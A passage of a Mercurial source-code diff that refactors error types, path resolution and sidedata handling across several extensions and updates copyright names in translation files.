-1752,7 +1763,7 @@ # /| # None of A and B will be changed to D and rebase fails. # A B D if set(newps) == set(oldps) and dest not in newps: - raise error.Abort( + raise error.InputError( _( b'cannot rebase %d:%s without ' b'moving at least one of its parents' @@ -1764,7 +1775,7 @@ # impossible. With multi-dest, the initial check does not cover complex # cases since we don't have abstractions to dry-run rebase cheaply. if any(p != nullrev and isancestor(rev, p) for p in newps): - raise error.Abort(_(b'source is ancestor of destination')) + raise error.InputError(_(b'source is ancestor of destination')) # Check if the merge will contain unwanted changes. That may happen if # there are multiple special (non-changelog ancestor) merge bases, which @@ -1826,7 +1837,7 @@ if revs is not None ) ) - raise error.Abort( + raise error.InputError( _(b'rebasing %d:%s will include unwanted changes from %s') % (rev, repo[rev], unwanteddesc) ) @@ -1971,7 +1982,7 @@ if destmap[r] not in srcset: result.append(r) if not result: - raise error.Abort(_(b'source and destination form a cycle')) + raise error.InputError(_(b'source and destination form a cycle')) srcset -= set(result) yield result @@ -1991,12 +2002,12 @@ if b'qtip' in repo.tags(): mqapplied = {repo[s.node].rev() for s in repo.mq.applied} if set(destmap.values()) & mqapplied: - raise error.Abort(_(b'cannot rebase onto an applied mq patch')) + raise error.StateError(_(b'cannot rebase onto an applied mq patch')) # Get "cycle" error early by exhausting the generator. sortedsrc = list(sortsource(destmap)) # a list of sorted revs if not sortedsrc: - raise error.Abort(_(b'no matching revisions')) + raise error.InputError(_(b'no matching revisions')) # Only check the first batch of revisions to rebase not depending on other # rebaseset. This means "source is ancestor of destination" for the second @@ -2004,7 +2015,7 @@ # "defineparents" to do that check. roots = list(repo.set(b'roots(%ld)', sortedsrc[0])) if not roots: - raise error.Abort(_(b'no matching revisions')) + raise error.InputError(_(b'no matching revisions')) def revof(r): return r.rev() @@ -2016,7 +2027,7 @@ dest = repo[destmap[root.rev()]] commonbase = root.ancestor(dest) if commonbase == root: - raise error.Abort(_(b'source is ancestor of destination')) + raise error.InputError(_(b'source is ancestor of destination')) if commonbase == dest: wctx = repo[None] if dest == wctx.p1(): @@ -2109,7 +2120,7 @@ if ui.configbool(b'commands', b'rebase.requiredest'): msg = _(b'rebase destination required by configuration') hint = _(b'use hg pull followed by hg rebase -d DEST') - raise error.Abort(msg, hint=hint) + raise error.InputError(msg, hint=hint) with repo.wlock(), repo.lock(): if opts.get('update'): @@ -2166,34 +2177,24 @@ commands.update(ui, repo) else: if opts.get('tool'): - raise error.Abort(_(b'--tool can only be used with --rebase')) + raise error.InputError(_(b'--tool can only be used with --rebase')) ret = orig(ui, repo, *args, **opts) return ret -def _filterobsoleterevs(repo, revs): - """returns a set of the obsolete revisions in revs""" - return {r for r in revs if repo[r].obsolete()} - +def _compute_obsolete_sets(repo, rebaseobsrevs, destmap): + """Figure out what to do about about obsolete revisions -def _computeobsoletenotrebased(repo, rebaseobsrevs, destmap): - """Return (obsoletenotrebased, obsoletewithoutsuccessorindestination). - - `obsoletenotrebased` is a mapping mapping obsolete => successor for all + `obsolete_with_successor_in_destination` is a mapping mapping obsolete => successor for all obsolete nodes to be rebased given in `rebaseobsrevs`. - `obsoletewithoutsuccessorindestination` is a set with obsolete revisions - without a successor in destination. - - `obsoleteextinctsuccessors` is a set of obsolete revisions with only - obsolete successors. + `obsolete_with_successor_in_rebase_set` is a set with obsolete revisions, + without a successor in destination, that would cause divergence. """ - obsoletenotrebased = {} - obsoletewithoutsuccessorindestination = set() - obsoleteextinctsuccessors = set() + obsolete_with_successor_in_destination = {} + obsolete_with_successor_in_rebase_set = set() - assert repo.filtername is None cl = repo.changelog get_rev = cl.index.get_rev extinctrevs = set(repo.revs(b'extinct()')) @@ -2205,29 +2206,25 @@ successors.remove(srcnode) succrevs = {get_rev(s) for s in successors} succrevs.discard(None) - if succrevs.issubset(extinctrevs): - # all successors are extinct - obsoleteextinctsuccessors.add(srcrev) - if not successors: - # no successor - obsoletenotrebased[srcrev] = None + if not successors or succrevs.issubset(extinctrevs): + # no successor, or all successors are extinct + obsolete_with_successor_in_destination[srcrev] = None else: dstrev = destmap[srcrev] for succrev in succrevs: if cl.isancestorrev(succrev, dstrev): - obsoletenotrebased[srcrev] = succrev + obsolete_with_successor_in_destination[srcrev] = succrev break else: # If 'srcrev' has a successor in rebase set but none in # destination (which would be catched above), we shall skip it # and its descendants to avoid divergence. if srcrev in extinctrevs or any(s in destmap for s in succrevs): - obsoletewithoutsuccessorindestination.add(srcrev) + obsolete_with_successor_in_rebase_set.add(srcrev) return ( - obsoletenotrebased, - obsoletewithoutsuccessorindestination, - obsoleteextinctsuccessors, + obsolete_with_successor_in_destination, + obsolete_with_successor_in_rebase_set, ) diff --git a/hgext/releasenotes.py b/hgext/releasenotes.py --- a/hgext/releasenotes.py +++ b/hgext/releasenotes.py @@ -280,7 +280,7 @@ if b'.hgreleasenotes' in ctx: read(b'.hgreleasenotes') - return p[b'sections'] + return p.items(b'sections') def checkadmonitions(ui, repo, directives, revs): diff --git a/hgext/relink.py b/hgext/relink.py --- a/hgext/relink.py +++ b/hgext/relink.py @@ -19,7 +19,10 @@ registrar, util, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) cmdtable = {} command = registrar.command(cmdtable) @@ -62,10 +65,11 @@ util, b'samedevice' ): raise error.Abort(_(b'hardlinks are not supported on this system')) - src = hg.repository( - repo.baseui, - ui.expandpath(origin or b'default-relink', origin or b'default'), - ) + + if origin is None and b'default-relink' in ui.paths: + origin = b'default-relink' + path, __ = urlutil.get_unique_pull_path(b'relink', repo, ui, origin) + src = hg.repository(repo.baseui, path) ui.status(_(b'relinking %s to %s\n') % (src.store.path, repo.store.path)) if repo.root == src.root: ui.status(_(b'there is nothing to relink\n')) diff --git a/hgext/remotefilelog/__init__.py b/hgext/remotefilelog/__init__.py --- a/hgext/remotefilelog/__init__.py +++ b/hgext/remotefilelog/__init__.py @@ -215,6 +215,8 @@ configitem(b'remotefilelog', b'backgroundprefetch', default=False) configitem(b'remotefilelog', b'prefetchdelay', default=120) configitem(b'remotefilelog', b'prefetchdays', default=14) +# Other values include 'local' or 'none'. Any unrecognized value is 'all'. +configitem(b'remotefilelog', b'strip.includefiles', default='all') configitem(b'remotefilelog', b'getfilesstep', default=10000) configitem(b'remotefilelog', b'getfilestype', default=b'optimistic') @@ -886,7 +888,7 @@ progress.update(count) count += 1 try: - path = ui.expandpath(os.path.normpath(path)) + path = util.expandpath(os.path.normpath(path)) except TypeError as e: ui.warn(_(b"warning: malformed path: %r:%s\n") % (path, e)) traceback.print_exc() diff --git a/hgext/remotefilelog/connectionpool.py b/hgext/remotefilelog/connectionpool.py --- a/hgext/remotefilelog/connectionpool.py +++ b/hgext/remotefilelog/connectionpool.py @@ -8,7 +8,6 @@ from __future__ import absolute_import from mercurial import ( - extensions, hg, pycompat, sshpeer, @@ -43,17 +42,19 @@ if conn is None: - def _cleanup(orig): - # close pipee first so peer.cleanup reading it won't deadlock, - # if there are other processes with pipeo open (i.e. us). - peer = orig.im_self - if util.safehasattr(peer, 'pipee'): - peer.pipee.close() - return orig() + peer = hg.peer(self._repo.ui, {}, path) + if util.safehasattr(peer, '_cleanup'): - peer = hg.peer(self._repo.ui, {}, path) - if util.safehasattr(peer, 'cleanup'): - extensions.wrapfunction(peer, b'cleanup', _cleanup) + class mypeer(peer.__class__): + def _cleanup(self, warn=None): + # close pipee first so peer.cleanup reading it won't + # deadlock, if there are other processes with pipeo + # open (i.e. us). + if util.safehasattr(self, 'pipee'): + self.pipee.close() + return super(mypeer, self)._cleanup() + + peer.__class__ = mypeer conn = connection(pathpool, peer) diff --git a/hgext/remotefilelog/contentstore.py b/hgext/remotefilelog/contentstore.py --- a/hgext/remotefilelog/contentstore.py +++ b/hgext/remotefilelog/contentstore.py @@ -365,7 +365,7 @@ ledger.markdataentry(self, treename, node) ledger.markhistoryentry(self, treename, node) - for path, encoded, size in self._store.datafiles(): + for t, path, encoded, size in self._store.datafiles(): if path[:5] != b'meta/' or path[-2:] != b'.i': continue diff --git a/hgext/remotefilelog/remotefilelog.py b/hgext/remotefilelog/remotefilelog.py --- a/hgext/remotefilelog/remotefilelog.py +++ b/hgext/remotefilelog/remotefilelog.py @@ -155,12 +155,12 @@ # text passed to "addrevision" includes hg filelog metadata header if node is None: node = storageutil.hashrevisionsha1(text, p1, p2) - if sidedata is None: - sidedata = {} meta, metaoffset = storageutil.parsemeta(text) rawtext, validatehash = flagutil.processflagswrite( - self, text, flags, sidedata=sidedata + self, + text, + flags, ) return self.addrawrevision( rawtext, @@ -306,6 +306,7 @@ assumehaveparentrevisions=False, deltaprevious=False, deltamode=None, + sidedata_helpers=None, ): # we don't use any of these parameters here del nodesorder, revisiondata, assumehaveparentrevisions, deltaprevious @@ -333,6 +334,8 @@ baserevisionsize=None, revision=revision, delta=delta, + # Sidedata is not supported yet + sidedata=None, ) def revdiff(self, node1, node2): diff --git a/hgext/remotefilelog/remotefilelogserver.py b/hgext/remotefilelog/remotefilelogserver.py --- a/hgext/remotefilelog/remotefilelogserver.py +++ b/hgext/remotefilelog/remotefilelogserver.py @@ -164,24 +164,26 @@ b'.d' ): n = util.pconvert(fp[striplen:]) - yield (store.decodedir(n), n, st.st_size) + d = store.decodedir(n) + t = store.FILETYPE_OTHER + yield (t, d, n, st.st_size) if kind == stat.S_IFDIR: visit.append(fp) if scmutil.istreemanifest(repo): - for (u, e, s) in repo.store.datafiles(): + for (t, u, e, s) in repo.store.datafiles(): if u.startswith(b'meta/') and ( u.endswith(b'.i') or u.endswith(b'.d') ): - yield (u, e, s) + yield (t, u, e, s) # Return .d and .i files that do not match the shallow pattern match = state.match if match and not match.always(): - for (u, e, s) in repo.store.datafiles(): + for (t, u, e, s) in repo.store.datafiles(): f = u[5:-2] # trim data/... and .i/.d if not state.match(f): - yield (u, e, s) + yield (t, u, e, s) for x in repo.store.topfiles(): if state.noflatmf and x[0][:11] == b'00manifest.': diff --git a/hgext/remotefilelog/shallowbundle.py b/hgext/remotefilelog/shallowbundle.py --- a/hgext/remotefilelog/shallowbundle.py +++ b/hgext/remotefilelog/shallowbundle.py @@ -67,7 +67,7 @@ shallowcg1packer, self, nodelist, rlog, lookup, units=units ) - def generatefiles(self, changedfiles, *args): + def generatefiles(self, changedfiles, *args, **kwargs): try: linknodes, commonrevs, source = args except ValueError: @@ -92,7 +92,9 @@ [f for f in changedfiles if not repo.shallowmatch(f)] ) - return super(shallowcg1packer, self).generatefiles(changedfiles, *args) + return super(shallowcg1packer, self).generatefiles( + changedfiles, *args, **kwargs + ) def shouldaddfilegroups(self, source): repo = self._repo @@ -102,6 +104,18 @@ if source == b"push" or source == b"bundle": return AllFiles + # We won't actually strip the files, but we should put them in any + # backup bundle generated by strip (especially for cases like narrow's + # `hg tracked --removeinclude`, as failing to do so means that the + # "saved" changesets during a strip won't have their files reapplied and + # thus their linknode adjusted, if necessary). + if source == b"strip": + cfg = repo.ui.config(b'remotefilelog', b'strip.includefiles') + if cfg == b'local': + return LocalFiles + elif cfg != b'none': + return AllFiles + caps = self._bundlecaps or [] if source == b"serve" or source == b"pull": if constants.BUNDLE2_CAPABLITY in caps: @@ -176,9 +190,11 @@ repo.shallowmatch = original -def addchangegroupfiles(orig, repo, source, revmap, trp, expectedfiles, *args): +def addchangegroupfiles( + orig, repo, source, revmap, trp, expectedfiles, *args, **kwargs +): if not shallowutil.isenabled(repo): - return orig(repo, source, revmap, trp, expectedfiles, *args) + return orig(repo, source, revmap, trp, expectedfiles, *args, **kwargs) newfiles = 0 visited = set() @@ -272,7 +288,7 @@ revisiondata = revisiondatas[(f, node)] # revisiondata: (node, p1, p2, cs, deltabase, delta, flags) - node, p1, p2, linknode, deltabase, delta, flags = revisiondata + node, p1, p2, linknode, deltabase, delta, flags, sidedata = revisiondata if not available(f, node, f, deltabase): continue diff --git a/hgext/schemes.py b/hgext/schemes.py --- a/hgext/schemes.py +++ b/hgext/schemes.py @@ -52,7 +52,9 @@ pycompat, registrar, templater, - util, +) +from mercurial.utils import ( + urlutil, ) cmdtable = {} @@ -86,7 +88,7 @@ ) def resolve(self, url): - # Should this use the util.url class, or is manual parsing better? + # Should this use the urlutil.url class, or is manual parsing better? try: url = url.split(b'://', 1)[1] except IndexError: @@ -137,7 +139,7 @@ ) hg.schemes[scheme] = ShortRepository(url, scheme, t) - extensions.wrapfunction(util, b'hasdriveletter', hasdriveletter) + extensions.wrapfunction(urlutil, b'hasdriveletter', hasdriveletter) @command(b'debugexpandscheme', norepo=True) diff --git a/hgext/share.py b/hgext/share.py --- a/hgext/share.py +++ b/hgext/share.py @@ -1,4 +1,4 @@ -# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/split.py b/hgext/split.py --- a/hgext/split.py +++ b/hgext/split.py @@ -12,7 +12,7 @@ from mercurial.i18n import _ from mercurial.node import ( - nullid, + nullrev, short, ) @@ -27,6 +27,7 @@ revsetlang, rewriteutil, scmutil, + util, ) # allow people to use split without explicitly enabling rebase extension @@ -69,57 +70,62 @@ if opts.get(b'rev'): revlist.append(opts.get(b'rev')) revlist.extend(revs) - with repo.wlock(), repo.lock(), repo.transaction(b'split') as tr: - revs = scmutil.revrange(repo, revlist or [b'.']) - if len(revs) > 1: - raise error.InputError(_(b'cannot split multiple revisions')) + with repo.wlock(), repo.lock(): + tr = repo.transaction(b'split') + # If the rebase somehow runs into conflicts, make sure + # we close the transaction so the user can continue it. + with util.acceptintervention(tr): + revs = scmutil.revrange(repo, revlist or [b'.']) + if len(revs) > 1: + raise error.InputError(_(b'cannot split multiple revisions')) - rev = revs.first() - ctx = repo[rev] - # Handle nullid specially here (instead of leaving for precheck() - # below) so we get a nicer message and error code. - if rev is None or ctx.node() == nullid: - ui.status(_(b'nothing to split\n')) - return 1 - if ctx.node() is None: - raise error.InputError(_(b'cannot split working directory')) + rev = revs.first() + # Handle nullrev specially here (instead of leaving for precheck() + # below) so we get a nicer message and error code. + if rev is None or rev == nullrev: + ui.status(_(b'nothing to split\n')) + return 1 + ctx = repo[rev] + if ctx.node() is None: + raise error.InputError(_(b'cannot split working directory')) - if opts.get(b'rebase'): - # Skip obsoleted descendants and their descendants so the rebase - # won't cause conflicts for sure. - descendants = list(repo.revs(b'(%d::) - (%d)', rev, rev)) - torebase = list( - repo.revs( - b'%ld - (%ld & obsolete())::', descendants, descendants + if opts.get(b'rebase'): + # Skip obsoleted descendants and their descendants so the rebase + # won't cause conflicts for sure. + descendants = list(repo.revs(b'(%d::) - (%d)', rev, rev)) + torebase = list( + repo.revs( + b'%ld - (%ld & obsolete())::', descendants, descendants + ) ) - ) - else: - torebase = [] - rewriteutil.precheck(repo, [rev] + torebase, b'split') + else: + torebase = [] + rewriteutil.precheck(repo, [rev] + torebase, b'split') - if len(ctx.parents()) > 1: - raise error.InputError(_(b'cannot split a merge changeset')) + if len(ctx.parents()) > 1: + raise error.InputError(_(b'cannot split a merge changeset')) - cmdutil.bailifchanged(repo) + cmdutil.bailifchanged(repo) - # Deactivate bookmark temporarily so it won't get moved unintentionally - bname = repo._activebookmark - if bname and repo._bookmarks[bname] != ctx.node(): - bookmarks.deactivate(repo) + # Deactivate bookmark temporarily so it won't get moved + # unintentionally + bname = repo._activebookmark + if bname and repo._bookmarks[bname] != ctx.node(): + bookmarks.deactivate(repo) - wnode = repo[b'.'].node() - top = None - try: - top = dosplit(ui, repo, tr, ctx, opts) - finally: - # top is None: split failed, need update --clean recovery. - # wnode == ctx.node(): wnode split, no need to update. - if top is None or wnode != ctx.node(): - hg.clean(repo, wnode, show_stats=False) - if bname: - bookmarks.activate(repo, bname) - if torebase and top: - dorebase(ui, repo, torebase, top) + wnode = repo[b'.'].node() + top = None + try: + top = dosplit(ui, repo, tr, ctx, opts) + finally: + # top is None: split failed, need update --clean recovery. + # wnode == ctx.node(): wnode split, no need to update. + if top is None or wnode != ctx.node(): + hg.clean(repo, wnode, show_stats=False) + if bname: + bookmarks.activate(repo, bname) + if torebase and top: + dorebase(ui, repo, torebase, top) def dosplit(ui, repo, tr, ctx, opts): @@ -165,19 +171,26 @@ b'message': header + ctx.description(), } ) + origctx = repo[b'.'] commands.commit(ui, repo, **pycompat.strkwargs(opts)) newctx = repo[b'.'] - committed.append(newctx) + # Ensure user didn't do a "no-op" split (such as deselecting + # everything). + if origctx.node() != newctx.node(): + committed.append(newctx) if not committed: raise error.InputError(_(b'cannot split an empty revision')) - scmutil.cleanupnodes( - repo, - {ctx.node(): [c.node() for c in committed]}, - operation=b'split', - fixphase=True, - ) + if len(committed) != 1 or committed[0].node() != ctx.node(): + # Ensure we don't strip a node if we produce the same commit as already + # exists + scmutil.cleanupnodes( + repo, + {ctx.node(): [c.node() for c in committed]}, + operation=b'split', + fixphase=True, + ) return committed[-1] diff --git a/hgext/sqlitestore.py b/hgext/sqlitestore.py --- a/hgext/sqlitestore.py +++ b/hgext/sqlitestore.py @@ -54,6 +54,7 @@ from mercurial.node import ( nullid, nullrev, + sha1nodeconstants, short, ) from mercurial.thirdparty import attr @@ -288,6 +289,7 @@ baserevisionsize = attr.ib() revision = attr.ib() delta = attr.ib() + sidedata = attr.ib() linknode = attr.ib(default=None) @@ -304,6 +306,7 @@ """Implements storage for an individual tracked path.""" def __init__(self, db, path, compression): + self.nullid = sha1nodeconstants.nullid self._db = db self._path = path @@ -586,6 +589,7 @@ revisiondata=False, assumehaveparentrevisions=False, deltamode=repository.CG_DELTAMODE_STD, + sidedata_helpers=None, ): if nodesorder not in (b'nodes', b'storage', b'linear', None): raise error.ProgrammingError( @@ -624,6 +628,7 @@ revisiondata=revisiondata, assumehaveparentrevisions=assumehaveparentrevisions, deltamode=deltamode, + sidedata_helpers=sidedata_helpers, ): yield delta @@ -636,7 +641,8 @@ if meta or filedata.startswith(b'\x01\n'): filedata = storageutil.packmeta(meta, filedata) - return self.addrevision(filedata, transaction, linkrev, p1, p2) + rev = self.addrevision(filedata, transaction, linkrev, p1, p2) + return self.node(rev) def addrevision( self, @@ -658,15 +664,16 @@ if validatehash: self._checkhash(revisiondata, node, p1, p2) - if node in self._nodetorev: - return node + rev = self._nodetorev.get(node) + if rev is not None: + return rev - node = self._addrawrevision( + rev = self._addrawrevision( node, revisiondata, transaction, linkrev, p1, p2 ) self._revisioncache[node] = revisiondata - return node + return rev def addgroup( self, @@ -679,7 +686,16 @@ ): empty = True - for node, p1, p2, linknode, deltabase, delta, wireflags in deltas: + for ( + node, + p1, + p2, + linknode, + deltabase, + delta, + wireflags, + sidedata, + ) in deltas: storeflags = 0 if wireflags & repository.REVISION_FLAG_CENSORED: @@ -741,7 +757,7 @@ ) if duplicaterevisioncb: - duplicaterevisioncb(self, node) + duplicaterevisioncb(self, self.rev(node)) empty = False continue @@ -752,7 +768,7 @@ text = None storedelta = (deltabase, delta) - self._addrawrevision( + rev = self._addrawrevision( node, text, transaction, @@ -764,7 +780,7 @@ ) if addrevisioncb: - addrevisioncb(self, node) + addrevisioncb(self, rev) empty = False return not empty @@ -897,6 +913,10 @@ def files(self): return [] + def sidedata(self, nodeorrev, _df=None): + # Not supported for now + return {} + def storageinfo( self, exclusivefiles=False, @@ -1079,7 +1099,7 @@ self._revtonode[rev] = node self._revisions[node] = entry - return node + return rev class sqliterepository(localrepo.localrepository): diff --git a/hgext/transplant.py b/hgext/transplant.py --- a/hgext/transplant.py +++ b/hgext/transplant.py @@ -47,6 +47,7 @@ from mercurial.utils import ( procutil, stringutil, + urlutil, ) @@ -818,7 +819,8 @@ sourcerepo = opts.get(b'source') if sourcerepo: - peer = hg.peer(repo, opts, ui.expandpath(sourcerepo)) + u = urlutil.get_unique_pull_path(b'transplant', repo, ui, sourcerepo)[0] + peer = hg.peer(repo, opts, u) heads = pycompat.maplist(peer.lookup, opts.get(b'branch', ())) target = set(heads) for r in revs: diff --git a/hgext/uncommit.py b/hgext/uncommit.py --- a/hgext/uncommit.py +++ b/hgext/uncommit.py @@ -175,7 +175,7 @@ old = repo[b'.'] rewriteutil.precheck(repo, [old.rev()], b'uncommit') if len(old.parents()) > 1: - raise error.Abort(_(b"cannot uncommit merge changeset")) + raise error.InputError(_(b"cannot uncommit merge changeset")) match = scmutil.match(old, pats, opts) @@ -202,7 +202,7 @@ else: hint = _(b"file does not exist") - raise error.Abort( + raise error.InputError( _(b'cannot uncommit "%s"') % scmutil.getuipathfn(repo)(f), hint=hint, ) @@ -280,7 +280,7 @@ markers = list(predecessormarkers(curctx)) if len(markers) != 1: e = _(b"changeset must have one predecessor, found %i predecessors") - raise error.Abort(e % len(markers)) + raise error.InputError(e % len(markers)) prednode = markers[0].prednode() predctx = unfi[prednode] diff --git a/hgext/win32text.py b/hgext/win32text.py --- a/hgext/win32text.py +++ b/hgext/win32text.py @@ -1,6 +1,6 @@ # win32text.py - LF <-> CRLF/CR translation utilities for Windows/Mac users # -# Copyright 2005, 2007-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005, 2007-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/zeroconf/__init__.py b/hgext/zeroconf/__init__.py --- a/hgext/zeroconf/__init__.py +++ b/hgext/zeroconf/__init__.py @@ -1,6 +1,6 @@ # zeroconf.py - zeroconf support for Mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/i18n/da.po b/i18n/da.po --- a/i18n/da.po +++ b/i18n/da.po @@ -1,6 +1,6 @@ # Danish translations for Mercurial # Danske oversættelser for Mercurial -# Copyright (C) 2009, 2010 Matt Mackall and others +# Copyright (C) 2009, 2010 Olivia Mackall and others # # Translation dictionary: # @@ -11359,11 +11359,11 @@ msgstr "(se http://mercurial.selenic.com for mere information)" msgid "" -"Copyright (C) 2005-2011 Matt Mackall and others\n" +"Copyright (C) 2005-2011 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2011 Matt Mackall og andre\n" +"Copyright (C) 2005-2011 Olivia Mackall og andre\n" "Dette er frit programmel; se kildekoden for kopieringsbetingelser. Der\n" "gives INGEN GARANTI; ikke engang for SALGBARHED eller EGNETHED FOR\n" "NOGET BESTEMT FORMÅL.\n" diff --git a/i18n/de.po b/i18n/de.po --- a/i18n/de.po +++ b/i18n/de.po @@ -1,6 +1,6 @@ # German translations for Mercurial # Deutsche Übersetzungen für Mercurial -# Copyright (C) 2009 Matt Mackall and others +# Copyright (C) 2009 Olivia Mackall and others # # Übersetzer: # Tobias Bell @@ -14536,11 +14536,11 @@ msgstr "(siehe http://mercurial.selenic.com für mehr Information)" msgid "" -"Copyright (C) 2005-2014 Matt Mackall and others\n" +"Copyright (C) 2005-2014 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2014 Matt Mackall und andere\n" +"Copyright (C) 2005-2014 Olivia Mackall und andere\n" "Dies ist freie Software; siehe Quellen für Kopierbestimmungen. Es besteht\n" "KEINE Gewährleistung für das Programm, nicht einmal der Marktreife oder der\n" "Verwendbarkeit für einen bestimmten Zweck.\n" @@ -18893,7 +18893,7 @@ msgstr "" msgid "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" @@ -19032,7 +19032,7 @@ msgid "" "Author\n" "\"\"\"\"\"\"\n" -"Written by Matt Mackall <mpm@selenic.com>" +"Written by Olivia Mackall <olivia@selenic.com>" msgstr "" msgid "" @@ -19050,7 +19050,7 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2014 Matt Mackall.\n" +"Copyright (C) 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" @@ -19088,7 +19088,7 @@ "Vadim Gelfer <vadim.gelfer@gmail.com>" msgstr "" -msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>." +msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>." msgstr "" msgid "" @@ -19101,7 +19101,7 @@ "Copying\n" "=======\n" "This manual page is copyright 2006 Vadim Gelfer.\n" -"Mercurial is copyright 2005-2014 Matt Mackall.\n" +"Mercurial is copyright 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" @@ -19307,7 +19307,7 @@ "Copying\n" "=======\n" "This manual page is copyright 2005 Bryan O'Sullivan.\n" -"Mercurial is copyright 2005-2014 Matt Mackall.\n" +"Mercurial is copyright 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" diff --git a/i18n/el.po b/i18n/el.po --- a/i18n/el.po +++ b/i18n/el.po @@ -1,7 +1,7 @@ # Greek translations for Mercurial # Ελληνική μετάφραση των μηνυμάτων του Mercurial # -# Copyright (C) 2009 Matt Mackall και άλλοι +# Copyright (C) 2009 Olivia Mackall και άλλοι # msgid "" msgstr "" @@ -7606,12 +7606,12 @@ msgid "" "\n" -"Copyright (C) 2005-2010 Matt Mackall <mpm@selenic.com> and others\n" +"Copyright (C) 2005-2010 Olivia Mackall <olivia@selenic.com> and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" "\n" -"Πνευματικά δικαιώματα (C) 2005-2009 Matt Mackall <mpm@selenic.com> και άλλοι\n" +"Πνευματικά δικαιώματα (C) 2005-2009 Olivia Mackall <olivia@selenic.com> και άλλοι\n" "Αυτό το πρόγραμμα είναι ελεύθερο λογισμικό· δείτε τον πηγαίο κώδικα για\n" "την άδεια χρήσης του. Δεν παρέχεται ΚΑΜΙΑ εγγύηση· ούτε καν για την\n" "ΕΜΠΟΡΕΥΣΙΜΟΤΗΤΑ ή την ΚΑΤΑΛΛΗΛΟΤΗΤΑ ΓΙΑ ΚΑΠΟΙΟ ΣΚΟΠΟ.\n" diff --git a/i18n/fr.po b/i18n/fr.po --- a/i18n/fr.po +++ b/i18n/fr.po @@ -1,6 +1,6 @@ # French translations for Mercurial # Traductions françaises de Mercurial -# Copyright (C) 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright (C) 2009 Olivia Mackall <olivia@selenic.com> and others # # Quelques règles : # - dans l'aide d'une commande, la première ligne descriptive @@ -9412,7 +9412,7 @@ msgid "" "\n" -"Copyright (C) 2005-2010 Matt Mackall <mpm@selenic.com> and others\n" +"Copyright (C) 2005-2010 Olivia Mackall <olivia@selenic.com> and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" diff --git a/i18n/hggettext b/i18n/hggettext --- a/i18n/hggettext +++ b/i18n/hggettext @@ -2,7 +2,7 @@ # # hggettext - carefully extract docstrings for Mercurial # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/i18n/it.po b/i18n/it.po --- a/i18n/it.po +++ b/i18n/it.po @@ -1,6 +1,6 @@ # Italian translations for Mercurial # Traduzione italiana per Mercurial -# Copyright (C) 2009 Matt Mackall and others +# Copyright (C) 2009 Olivia Mackall and others msgid "" msgstr "" "Project-Id-Version: Mercurial\n" @@ -8881,11 +8881,11 @@ msgstr "" msgid "" -"Copyright (C) 2005-2011 Matt Mackall and others\n" +"Copyright (C) 2005-2011 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2011 Matt Mackall e altri\n" +"Copyright (C) 2005-2011 Olivia Mackall e altri\n" "Questo è software libero; vedere i sorgenti per le condizioni di copia.\n" "Non c'è ALCUNA garanzia; neppure di COMMERCIABILITÀ o IDONEITÀ AD UNO\n" "SCOPO PARTICOLARE.\n" diff --git a/i18n/ja.po b/i18n/ja.po --- a/i18n/ja.po +++ b/i18n/ja.po @@ -18771,11 +18771,11 @@ msgstr "(詳細は https://mercurial-scm.org を参照)" msgid "" -"Copyright (C) 2005-2018 Matt Mackall and others\n" +"Copyright (C) 2005-2018 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2018 Matt Mackall and others\n" +"Copyright (C) 2005-2018 Olivia Mackall and others\n" "本製品はフリーソフトウェアです。\n" "頒布条件に関しては同梱されるライセンス条項をお読みください。\n" "市場適合性や特定用途への可否を含め、 本製品は無保証です。\n" @@ -30239,11 +30239,11 @@ msgid "" "Author\n" "\"\"\"\"\"\"\n" -"Written by Matt Mackall <mpm@selenic.com>" +"Written by Olivia Mackall <olivia@selenic.com>" msgstr "" "著者\n" "\"\"\"\"\n" -"Matt Mackall <mpm@selenic.com>" +"Olivia Mackall <olivia@selenic.com>" msgid "" "Resources\n" @@ -30264,13 +30264,13 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2016 Matt Mackall.\n" 